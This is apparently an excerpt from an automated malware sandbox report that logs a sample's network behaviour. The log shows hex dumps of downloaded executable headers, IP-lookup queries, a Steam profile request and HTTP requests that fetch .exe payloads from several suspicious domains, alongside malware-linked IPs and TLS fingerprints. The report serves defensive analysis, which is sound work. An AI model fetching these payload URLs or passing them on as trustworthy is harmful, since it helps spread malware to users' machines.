Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 01 May 2024 06:40:20 GMTContent-Type: application/octet-streamContent-Length: 3196416Last-Modified: Wed, 01 May 2024 03:58:33 GMTConnection: keep-aliveETag: "6631bde9-30c600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6a 99 1d e4 2e f8 73 b7 2e f8 73 b7 2e f8 73 b7 65 80 70 b6 25 f8 73 b7 65 80 76 b6 ee f8 73 b7 65 80 74 b6 2f f8 73 b7 ec 79 8e b7 2a f8 73 b7 ec 79 77 b6 3d f8 73 b7 ec 79 70 b6 34 f8 73 b7 ec 79 76 b6 75 f8 73 b7 65 80 77 b6 36 f8 73 b7 65 80 75 b6 2f f8 73 b7 65 80 72 b6 35 f8 73 b7 2e f8 72 b7 0e f9 73 b7 dd 7a 7a b6 32 f8 73 b7 dd 7a 8c b7 2f f8 73 b7 2e f8 e4 b7 2f f8 73 b7 dd 7a 71 b6 2f f8 73 b7 52 69 63 68 2e f8 73 b7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 5e ef 25 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 8c 15 00 00 0e 04 00 00 00 00 00 1c d4 b4 00 00 10 00 00 00 a0 15 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 b4 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 50 c0 92 00 83 0c 00 00 d4 cc 92 00 b0 03 00 00 00 c0 19 00 a0 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 c0 92 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 92 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 15 00 00 10 00 00 00 26 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 02 00 00 a0 15 00 00 02 01 00 00 2a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 20 18 00 00 08 00 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 b0 00 00 00 70 18 00 00 00 00 00 00 34 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 a0 00 00 00 20 19 00 00 60 00 00 00 34 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 b0 00 00 00 c0 19 00 00 b0 00 00 00 94 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 20 78 00 00 70 1a 00 00 28 03 00 00 44 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 60 22 00 00 90 92 00 00 5a 22 00 00 6c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=Retailer_prog.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 5809400Content-Type: application/octet-streamData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 e7 e6 0f 66 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 27 00 34 11 00 00 a8 08 00 00 00 00 00 94 13 cd 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 cf 00 00 02 00 00 73 a7 58 00 02 00 00 80 00 00 10 00 00 10 03 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 10 cd 00 4c 00 00 00 4c 10 cd 00 48 03 00 00 00 20 cd 00 e4 ad 02 00 00 00 00 00 00 00 00 00 00 8c 58 00 f8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f cd 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 11 cd 00 68 00 00 00 bc a0 a1 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 00 cd 00 00 10 00 00 00 cc 55 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 20 0f 00 00 00 10 cd 00 00 10 00 00 00 ce 55 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 e4 ad 02 00 00 20 cd 00 00 ae 02 00 00 de 55 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 d0 0c 0e cb 55 00 20 07 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 d3 2f c5 3a 3c 01 4b b1 7e c9 8a 8a 4d 2f a3 0d d9 7f a6 e3 8c 23 11 53 e0 59 18 c5 75 8a e2 77 f8 b6 94 7f 0c 6a c0 de 74 49 64 e2 e9 5c 53 b2 04 d8 f7 44 0c ab 5f 0d 6d 46 e9 e5 c3 76 88 b7 96 57 ac b6 4d e1 69 1d 6f fb 4b 88 10 6c 42 cb 88 3f 5c 00 8f d0 4e af 26 28 94 71 1f 3d 8f 24 e1 70 9e a7 23 5f ec 28 cb 85 d1 95 98 8a 7e 2a 91 f2 27 75 f7 19 c0 06 98 4d 98 fd d8 af d5 90 0f c4 25 53 f8 f5 91 36 31 05 a5 b0 ee 6f c1 70 4d 47 0c d1 91 11 aa ad 60 1d ba ce b1 27 18 5c 59 86 e9 66 52 58 be e9 76 ac 59 e4 e5 5b 05 08 f9 c7 da ad fc fb 52 2b 74 cd 1e 5b 20 42 f9 dd 53 3d f7 db 10 60 58 bb b2 ca 4e c6 71 27 53 10 be 7a 6d 29 60 69 13 9b 84 fc c4 ff 32 a7 62 ed a9 f1 85 65 80 b2 6a ef e3 f8 d5 5f 36 00 c8 b4 11 a3 ee aa a9 26 3c ba 51 51 28 1e 0f 2e 0d 2f c3 7c 21 b4 d7 10 3a 32 57 50 ca 45 af 4e e2 cb c2 a3 32 50 8b f5 dd 01 f4 53 f8 5e 98 97 03 10 d7 65 0d d7 f6 83 be 6c eb d3 92 53 c4 ef c3 41 a5 24 f4 e9 6a f2 d2 75 99 8c 19 fb 7d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 02 Apr 2024 08:24:20 GMTETag: "ab2000-61518d52a9500"Accept-Ranges: bytesContent-Length: 11214848Content-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 db 4c 00 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 2e ca 00 00 00 00 00 79 fc 01 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 a1 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 66 01 64 00 00 00 00 10 a1 01 58 2c 00 00 60 d8 a0 01 fc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 fb 00 28 00 00 00 20 d7 a0 01 38 01 00 00 00 00 00 00 00 00 00 00 00 10 f6 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e6 7e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f0 1d 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 e9 c9 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 a0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 e3 34 2b 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 38 08 00 00 00 10 f6 00 00 0a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 5c e3 aa 00 00 20 f6 00 00 e4 aa 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 58 2c 00 00 00 10 a1 01 00 2e 00 00 00 f2 aa 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:23 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=Default12_big.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 5929720Content-Type: application/octet-streamData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 e7 e6 0f 66 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 27 00 34 11 00 00 a6 08 00 00 00 00 00 94 43 cf 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 d2 00 00 02 00 00 10 e0 5a 00 02 00 00 80 00 00 10 00 00 10 03 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 40 cf 00 4c 00 00 00 4c 40 cf 00 48 03 00 00 00 50 cf 00 10 ad 02 00 00 00 00 00 00 00 00 00 00 62 5a 00 f8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f cf 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 41 cf 00 68 00 00 00 10 a3 c3 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 30 cf 00 00 10 00 00 00 a2 57 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 20 0f 00 00 00 40 cf 00 00 10 00 00 00 a4 57 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 10 ad 02 00 00 50 cf 00 00 ae 02 00 00 b4 57 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 f3 0c 12 a0 57 00 20 07 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 d3 2f c5 3a 3c 01 4b b1 7e c9 8a 8a 4d 2f a3 0d d9 7f a6 e3 8c 23 11 53 e0 59 18 c5 75 8a e2 77 f8 b6 94 7f 0c 6a c0 de 74 49 64 e2 e9 5c 53 b2 04 d8 f7 44 0c ab 5f 0d 6d 46 e9 e5 c3 76 88 b7 96 57 ac b6 4d e1 69 1d 6f fb 4b 88 10 6c 42 cb 88 3f 5c 00 8f d0 4e af 26 28 94 71 1f 3d 8f 24 e1 70 9e a7 23 5f ec 28 cb 85 d1 95 98 8a 7e 2a 91 f2 27 75 f7 19 c0 06 98 4d 98 fd d8 af d5 90 0f c4 25 53 f8 f5 91 36 31 05 a5 b0 ee 6f c1 70 4d 47 0c d1 91 11 aa ad 60 1d ba ce b1 27 18 5c 59 86 e9 66 52 58 be e9 76 ac 59 e4 e5 5b 05 08 f9 c7 da ad fc fb 52 2b 74 cd 1e 5b 20 42 f9 dd 53 3d f7 db 10 60 52 82 1f c5 2e c6 71 27 53 10 be 7a 6d 29 60 69 13 9b 84 fc c4 ff 32 a7 62 ed a9 f1 85 65 80 b2 6a ef e3 f8 d5 5f 36 00 c8 b4 11 a3 ee aa a9 26 3c ba 51 51 28 1e 0f 2e 0d 2f c3 7c 21 b4 d7 10 3a 32 57 50 ca 45 af 4e e2 cb c2 a3 32 50 8b f5 dd 01 f4 53 f8 5e 98 97 03 10 d7 65 0d d7 f6 83 be 6c eb d3 92 53 c4 ef c3 41 a5 24 f4 e9 6a f2 d2 75 99 8c 19 fb 7d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.0Date: Wed, 01 May 2024 06:40:23 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=aeb24096.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 20 81 e9 50 4e d2 e9 50 4e d2 e9 50 4e d2 2a 5f 11 d2 eb 50 4e d2 e9 50 4f d2 4a 50 4e d2 2a 5f 13 d2 e6 50 4e d2 bd 73 7e d2 e3 50 4e d2 2e 56 48 d2 e8 50 4e d2 52 69 63 68 e9 50 4e d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 63 dc a0 64 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 22 02 00 00 08 00 00 fc 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 84 00 00 a0 00 00 00 00 a0 03 00 90 18 00 00 00 00 00 00 00 00 00 00 8c 5d 0a 00 98 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 58 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fb 01 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 90 18 00 00 00 a0 03 00 00 1a 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:24 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=Space1.9_big.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 5995256Content-Type: application/octet-streamData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 e7 e6 0f 66 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 27 00 34 11 00 00 4a 08 00 00 00 00 00 94 53 d3 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 d5 00 00 02 00 00 f2 3b 5c 00 02 00 00 80 00 00 10 00 00 10 03 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 50 d3 00 4c 00 00 00 4c 50 d3 00 48 03 00 00 00 60 d3 00 04 50 02 00 00 00 00 00 00 00 00 00 00 62 5b 00 f8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f d3 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 51 d3 00 68 00 00 00 0c 93 87 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 40 d3 00 00 10 00 00 00 fe 58 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 20 0f 00 00 00 50 d3 00 00 10 00 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 04 50 02 00 00 60 d3 00 00 52 02 00 00 10 59 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 34 0d fd fc 58 00 20 07 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 d3 2f c5 3a 3c 01 4b b1 7e c9 8a 8a 4d 2f a3 0d d9 7f a6 e3 8c 23 11 53 e0 59 18 c5 75 8a e2 77 f8 b6 94 7f 0c 6a c0 de 74 49 64 e2 e9 5c 53 b2 04 d8 f7 44 0c ab 5f 0d 6d 46 e9 e5 c3 76 88 b7 96 57 ac b6 4d e1 69 1d 6f fb 4b 88 10 6c 42 cb 88 3f 5c 00 8f d0 4e af 26 28 94 71 1f 3d 8f 24 e1 70 9e a7 23 5f ec 28 cb 85 d1 95 98 8a 7e 2a 91 f2 27 75 f7 19 c0 06 98 4d 98 fd d8 af d5 90 0f c4 25 53 f8 f5 91 36 31 05 a5 b0 ee 6f c1 70 4d 47 0c d1 91 11 aa ad 60 1d ba ce b1 27 18 5c 59 86 e9 66 52 58 be e9 76 ac 59 e4 e5 5b 05 08 f9 c7 da ad fc fb 52 2b 74 cd 1e 5b 20 42 f9 dd 53 3d f7 db 10 60 53 21 8a b5 ce c6 71 27 53 10 be 7a 6d 29 60 69 13 9b 84 fc c4 ff 32 a7 62 ed a9 f1 85 65 80 b2 6a ef e3 f8 d5 5f 36 00 c8 b4 11 a3 ee aa a9 26 3c ba 51 51 28 1e 0f 2e 0d 2f c3 7c 21 b4 d7 10 3a 32 57 50 ca 45 af 4e e2 cb c2 a3 32 50 8b f5 dd 01 f4 53 f8 5e 98 97 03 10 d7 65 0d d7 f6 83 be 6f 69 5e 1e 6b 44 e5 9d ec 7c a4 57 6a 58 55 b9 96 08 4d 4e e4 01

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 193.233.132.139 193.233.132.139
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 37.221.125.202 37.221.125.202

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PTSERVIDORPT PTSERVIDORPT

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: api.myip.com
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: iplogger.org
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: HEAD /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sextipolar.sbsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: zanzibarpivo.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: triedchicken.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /style/060.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: dod.fastbutters.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cheremushki.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: carthewasher.netConnection: Keep-Alive
